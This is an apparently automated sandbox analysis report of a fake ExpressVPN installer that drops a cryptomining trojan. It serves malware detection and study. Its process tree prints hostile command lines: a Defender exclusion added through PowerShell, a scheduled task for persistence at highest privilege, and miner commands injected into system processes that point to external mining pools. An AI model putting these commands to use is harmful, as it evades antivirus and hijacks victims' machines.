9cb9bb13a44968f6b919829342f692d27d45b66cc1e0108a072d7ba3d940fe1a

Analysis

max time kernel
43s
max time network
127s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
19-08-2022 19:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ExpressVPN_setup.exe
Size

2.3MB
MD5

b8a48ef181d65145334e2ff0e0d3fbf6
SHA1

53263570e35e8d528c4f56073dc2ba6e9a97819c
SHA256

9cb9bb13a44968f6b919829342f692d27d45b66cc1e0108a072d7ba3d940fe1a
SHA512

fc5a22ba1cc008132ef3ecd16119896477057a174b002da01fa28b246396fb2b372d1cf768fee6a8c799413762d476d01139f340a2b3e8336364d758cf482b19

Score

8^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

Processes:

DHUZT.exetmp92DE.tmp.exe

pid process

680 DHUZT.exe
764 tmp92DE.tmp.exe

pid	process
680	DHUZT.exe
764	tmp92DE.tmp.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1416-111-0x0000000140000000-0x0000000142EFE000-memory.dmp	upx
behavioral1/memory/1416-113-0x0000000140000000-0x0000000142EFE000-memory.dmp	upx
behavioral1/memory/1416-114-0x0000000140000000-0x0000000142EFE000-memory.dmp	upx
behavioral1/memory/1416-116-0x0000000140000000-0x0000000142EFE000-memory.dmp	upx

Loads dropped DLL 4 IoCs

Processes:

cmd.exeWerFault.exe

pid process

948 cmd.exe
360 WerFault.exe
360 WerFault.exe
360 WerFault.exe
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Suspicious use of SetThreadContext 2 IoCs

Processes:

DHUZT.exe

description pid process target process

PID 680 set thread context of 1660 680 DHUZT.exe vbc.exe
PID 680 set thread context of 1416 680 DHUZT.exe explorer.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

360 764 WerFault.exe tmp92DE.tmp.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1412 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1524 timeout.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exeDHUZT.exe

pid process

2020 powershell.exe
1784 powershell.exe
680 DHUZT.exe
680 DHUZT.exe

pid	process
948	cmd.exe
360	WerFault.exe
360	WerFault.exe
360	WerFault.exe

description	pid	process	target process
PID 680 set thread context of 1660	680	DHUZT.exe	vbc.exe
PID 680 set thread context of 1416	680	DHUZT.exe	explorer.exe

pid	pid_target	process	target process
360	764	WerFault.exe	tmp92DE.tmp.exe

pid	process
1412	schtasks.exe

pid	process
1524	timeout.exe

pid	process
2020	powershell.exe
1784	powershell.exe
680	DHUZT.exe
680	DHUZT.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

ExpressVPN_setup.exepowershell.exeDHUZT.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	576	ExpressVPN_setup.exe
Token: SeDebugPrivilege	2020	powershell.exe
Token: SeDebugPrivilege	680	DHUZT.exe
Token: SeDebugPrivilege	1784	powershell.exe

Suspicious use of WriteProcessMemory 54 IoCs

Processes:

ExpressVPN_setup.execmd.exeDHUZT.execmd.exetmp92DE.tmp.exevbc.exe

description	pid	process	target process
PID 576 wrote to memory of 2020	576	ExpressVPN_setup.exe	powershell.exe
PID 576 wrote to memory of 2020	576	ExpressVPN_setup.exe	powershell.exe
PID 576 wrote to memory of 2020	576	ExpressVPN_setup.exe	powershell.exe
PID 576 wrote to memory of 948	576	ExpressVPN_setup.exe	cmd.exe
PID 576 wrote to memory of 948	576	ExpressVPN_setup.exe	cmd.exe
PID 576 wrote to memory of 948	576	ExpressVPN_setup.exe	cmd.exe
PID 948 wrote to memory of 1524	948	cmd.exe	timeout.exe
PID 948 wrote to memory of 1524	948	cmd.exe	timeout.exe
PID 948 wrote to memory of 1524	948	cmd.exe	timeout.exe
PID 948 wrote to memory of 680	948	cmd.exe	DHUZT.exe
PID 948 wrote to memory of 680	948	cmd.exe	DHUZT.exe
PID 948 wrote to memory of 680	948	cmd.exe	DHUZT.exe
PID 680 wrote to memory of 1784	680	DHUZT.exe	powershell.exe
PID 680 wrote to memory of 1784	680	DHUZT.exe	powershell.exe
PID 680 wrote to memory of 1784	680	DHUZT.exe	powershell.exe
PID 680 wrote to memory of 644	680	DHUZT.exe	cmd.exe
PID 680 wrote to memory of 644	680	DHUZT.exe	cmd.exe
PID 680 wrote to memory of 644	680	DHUZT.exe	cmd.exe
PID 644 wrote to memory of 1412	644	cmd.exe	schtasks.exe
PID 644 wrote to memory of 1412	644	cmd.exe	schtasks.exe
PID 644 wrote to memory of 1412	644	cmd.exe	schtasks.exe
PID 680 wrote to memory of 764	680	DHUZT.exe	tmp92DE.tmp.exe
PID 680 wrote to memory of 764	680	DHUZT.exe	tmp92DE.tmp.exe
PID 680 wrote to memory of 764	680	DHUZT.exe	tmp92DE.tmp.exe
PID 680 wrote to memory of 764	680	DHUZT.exe	tmp92DE.tmp.exe
PID 764 wrote to memory of 360	764	tmp92DE.tmp.exe	WerFault.exe
PID 764 wrote to memory of 360	764	tmp92DE.tmp.exe	WerFault.exe
PID 764 wrote to memory of 360	764	tmp92DE.tmp.exe	WerFault.exe
PID 764 wrote to memory of 360	764	tmp92DE.tmp.exe	WerFault.exe
PID 680 wrote to memory of 1660	680	DHUZT.exe	vbc.exe
PID 680 wrote to memory of 1660	680	DHUZT.exe	vbc.exe
PID 680 wrote to memory of 1660	680	DHUZT.exe	vbc.exe
PID 680 wrote to memory of 1660	680	DHUZT.exe	vbc.exe
PID 680 wrote to memory of 1660	680	DHUZT.exe	vbc.exe
PID 680 wrote to memory of 1660	680	DHUZT.exe	vbc.exe
PID 680 wrote to memory of 1660	680	DHUZT.exe	vbc.exe
PID 680 wrote to memory of 1660	680	DHUZT.exe	vbc.exe
PID 680 wrote to memory of 1660	680	DHUZT.exe	vbc.exe
PID 680 wrote to memory of 1660	680	DHUZT.exe	vbc.exe
PID 680 wrote to memory of 1660	680	DHUZT.exe	vbc.exe
PID 680 wrote to memory of 1660	680	DHUZT.exe	vbc.exe
PID 680 wrote to memory of 1660	680	DHUZT.exe	vbc.exe
PID 680 wrote to memory of 1660	680	DHUZT.exe	vbc.exe
PID 680 wrote to memory of 1660	680	DHUZT.exe	vbc.exe
PID 1660 wrote to memory of 1076	1660	vbc.exe	cmd.exe
PID 1660 wrote to memory of 1076	1660	vbc.exe	cmd.exe
PID 1660 wrote to memory of 1076	1660	vbc.exe	cmd.exe
PID 680 wrote to memory of 1416	680	DHUZT.exe	explorer.exe
PID 680 wrote to memory of 1416	680	DHUZT.exe	explorer.exe
PID 680 wrote to memory of 1416	680	DHUZT.exe	explorer.exe
PID 680 wrote to memory of 1416	680	DHUZT.exe	explorer.exe
PID 680 wrote to memory of 1416	680	DHUZT.exe	explorer.exe
PID 680 wrote to memory of 1416	680	DHUZT.exe	explorer.exe
PID 680 wrote to memory of 1416	680	DHUZT.exe	explorer.exe

C:\Users\Admin\AppData\Local\Temp\ExpressVPN_setup.exe
"C:\Users\Admin\AppData\Local\Temp\ExpressVPN_setup.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2020

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp74D3.tmp.bat""
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:948

C:\Windows\system32\timeout.exe
timeout 3
3⤵
- Delays execution with timeout.exe
PID:1524

C:\ProgramData\ccl\DHUZT.exe
"C:\ProgramData\ccl\DHUZT.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:680

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1784

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:644

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"
5⤵
- Creates scheduled task(s)
PID:1412

C:\Users\Admin\AppData\Local\Temp\tmp92DE.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp92DE.tmp.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 764 -s 96
5⤵
- Loads dropped DLL
- Program crash
PID:360

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RGvbrbsSuWBAhQiVVqYY73R6VMCC1AwQYi.work -p x -t 5
4⤵
- Suspicious use of WriteProcessMemory
PID:1660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
5⤵
PID:1076

C:\Windows\explorer.exe
C:\Windows\explorer.exe --algo ETHASH --pool eu1.ethermine.org:4444 --user 0x4ab03527AFE5eA0Dd109B60309b01Cf15c83E0eB.RIG_1
4⤵
PID:1416

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\ccl\DHUZT.exe
Filesize
2.3MB

MD5
b8a48ef181d65145334e2ff0e0d3fbf6

SHA1
53263570e35e8d528c4f56073dc2ba6e9a97819c

SHA256
9cb9bb13a44968f6b919829342f692d27d45b66cc1e0108a072d7ba3d940fe1a

SHA512
fc5a22ba1cc008132ef3ecd16119896477057a174b002da01fa28b246396fb2b372d1cf768fee6a8c799413762d476d01139f340a2b3e8336364d758cf482b19

Download Submit
C:\ProgramData\ccl\DHUZT.exe
Filesize
2.3MB

MD5
b8a48ef181d65145334e2ff0e0d3fbf6

SHA1
53263570e35e8d528c4f56073dc2ba6e9a97819c

SHA256
9cb9bb13a44968f6b919829342f692d27d45b66cc1e0108a072d7ba3d940fe1a

SHA512
fc5a22ba1cc008132ef3ecd16119896477057a174b002da01fa28b246396fb2b372d1cf768fee6a8c799413762d476d01139f340a2b3e8336364d758cf482b19

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp74D3.tmp.bat
Filesize
137B

MD5
6e5a6f8836c39019bcf48197e44b6a35

SHA1
e01ff4391cf8af7f45593e68da7b64fd55ae474d

SHA256
015288242165dd6b3ec48b61056428ec06505008d2cd3ed17edace3649686329

SHA512
5ca0d51910bffda4fbe0881ab1eb6a53c96e9a8fe5262564b24862fbe0e0764d7a386165aff7442abaac471b56994479183904dbdc5ef6d46beaf562fa332baf

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp92DE.tmp.exe
Filesize
74KB

MD5
cdd3d44d9e64a113618961f0a4e691b9

SHA1
a762037bc50ddb7507d5ef1a20ce813ad990bb54

SHA256
dbeb4b5ef3a49b4df0bc816a52f875e5aa6ad674aa8e2b458e9736da0b366ec0

SHA512
55146e6464bf74266520341fae0b097ddfea1d6ed7fadf7e0dcf0eba7ac1c29384ad76f245994ea69f68dc85cdcdcb9fc4a2a1eede5db95001dbcd870505a3d8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
ee0f9a5aeb37f999528ba3eb643ccbb4

SHA1
698d447db57af9d0a0b38d54ea3d5a1d48061255

SHA256
0d5a3de55f0b2a5389a3986ae0ff153d7cfcf98fa9f0548fdb7d5ca1eb8fabde

SHA512
9cd9a8ea53cd2768098e91dcf0e5e15e1771bb37994fbdd5fe4882f509464c65fdb1eb3c6bc490bf8117eae005f350bcd3e368e651f61031d3a759b7efa78bf8

Download Submit
\ProgramData\ccl\DHUZT.exe
Filesize
2.3MB

MD5
b8a48ef181d65145334e2ff0e0d3fbf6

SHA1
53263570e35e8d528c4f56073dc2ba6e9a97819c

SHA256
9cb9bb13a44968f6b919829342f692d27d45b66cc1e0108a072d7ba3d940fe1a

SHA512
fc5a22ba1cc008132ef3ecd16119896477057a174b002da01fa28b246396fb2b372d1cf768fee6a8c799413762d476d01139f340a2b3e8336364d758cf482b19

Download Submit
\Users\Admin\AppData\Local\Temp\tmp92DE.tmp.exe
Filesize
74KB

MD5
cdd3d44d9e64a113618961f0a4e691b9

SHA1
a762037bc50ddb7507d5ef1a20ce813ad990bb54

SHA256
dbeb4b5ef3a49b4df0bc816a52f875e5aa6ad674aa8e2b458e9736da0b366ec0

SHA512
55146e6464bf74266520341fae0b097ddfea1d6ed7fadf7e0dcf0eba7ac1c29384ad76f245994ea69f68dc85cdcdcb9fc4a2a1eede5db95001dbcd870505a3d8

Download Submit
\Users\Admin\AppData\Local\Temp\tmp92DE.tmp.exe
Filesize
74KB

MD5
cdd3d44d9e64a113618961f0a4e691b9

SHA1
a762037bc50ddb7507d5ef1a20ce813ad990bb54

SHA256
dbeb4b5ef3a49b4df0bc816a52f875e5aa6ad674aa8e2b458e9736da0b366ec0

SHA512
55146e6464bf74266520341fae0b097ddfea1d6ed7fadf7e0dcf0eba7ac1c29384ad76f245994ea69f68dc85cdcdcb9fc4a2a1eede5db95001dbcd870505a3d8

Download Submit
\Users\Admin\AppData\Local\Temp\tmp92DE.tmp.exe
Filesize
74KB

MD5
cdd3d44d9e64a113618961f0a4e691b9

SHA1
a762037bc50ddb7507d5ef1a20ce813ad990bb54

SHA256
dbeb4b5ef3a49b4df0bc816a52f875e5aa6ad674aa8e2b458e9736da0b366ec0

SHA512
55146e6464bf74266520341fae0b097ddfea1d6ed7fadf7e0dcf0eba7ac1c29384ad76f245994ea69f68dc85cdcdcb9fc4a2a1eede5db95001dbcd870505a3d8

Download Submit
memory/360-85-0x0000000000000000-mapping.dmp

Download
memory/576-54-0x000000013FB80000-0x000000013FDC6000-memory.dmp

Filesize
2.3MB

Download
memory/576-55-0x000000001B070000-0x000000001B142000-memory.dmp

Filesize
840KB

Download
memory/644-74-0x0000000000000000-mapping.dmp

Download
memory/680-68-0x0000000000000000-mapping.dmp

Download
memory/680-71-0x000000013F7C0000-0x000000013FA06000-memory.dmp

Filesize
2.3MB

Download
memory/764-83-0x0000000000000000-mapping.dmp

Download
memory/948-58-0x0000000000000000-mapping.dmp

Download
memory/1076-108-0x0000000000000000-mapping.dmp

Download
memory/1412-76-0x0000000000000000-mapping.dmp

Download
memory/1416-111-0x0000000140000000-0x0000000142EFE000-memory.dmp

Filesize
47.0MB

Download
memory/1416-110-0x0000000140000000-0x0000000142EFE000-memory.dmp

Filesize
47.0MB

Download
memory/1416-113-0x0000000140000000-0x0000000142EFE000-memory.dmp

Filesize
47.0MB

Download
memory/1416-114-0x0000000140000000-0x0000000142EFE000-memory.dmp

Filesize
47.0MB

Download
memory/1416-115-0x0000000142EFC000-mapping.dmp

Download
memory/1416-116-0x0000000140000000-0x0000000142EFE000-memory.dmp

Filesize
47.0MB

Download
memory/1524-60-0x0000000000000000-mapping.dmp

Download
memory/1660-103-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1660-100-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1660-117-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1660-109-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1660-107-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1660-105-0x000000014006EE80-mapping.dmp

Download
memory/1660-104-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1660-89-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1660-90-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1660-92-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1660-94-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1660-95-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1660-97-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1660-98-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1660-99-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1660-101-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1784-77-0x000007FEEC630000-0x000007FEED053000-memory.dmp

Filesize
10.1MB

Download
memory/1784-81-0x00000000023D4000-0x00000000023D7000-memory.dmp

Filesize
12KB

Download
memory/1784-79-0x00000000023D4000-0x00000000023D7000-memory.dmp

Filesize
12KB

Download
memory/1784-82-0x00000000023DB000-0x00000000023FA000-memory.dmp

Filesize
124KB

Download
memory/1784-72-0x0000000000000000-mapping.dmp

Download
memory/1784-78-0x000007FEEF370000-0x000007FEEFD0D000-memory.dmp

Filesize
9.6MB

Download
memory/1784-80-0x000000001B710000-0x000000001BA0F000-memory.dmp

Filesize
3.0MB

Download
memory/2020-56-0x0000000000000000-mapping.dmp

Download
memory/2020-57-0x000007FEFBF01000-0x000007FEFBF03000-memory.dmp

Filesize
8KB

Download
memory/2020-62-0x000007FEF5310000-0x000007FEF5E6D000-memory.dmp

Filesize
11.4MB

Download
memory/2020-63-0x0000000002884000-0x0000000002887000-memory.dmp

Filesize
12KB

Download
memory/2020-64-0x000000001B790000-0x000000001BA8F000-memory.dmp

Filesize
3.0MB

Download
memory/2020-66-0x000000000288B000-0x00000000028AA000-memory.dmp

Filesize
124KB

Download
memory/2020-65-0x0000000002884000-0x0000000002887000-memory.dmp

Filesize
12KB

Download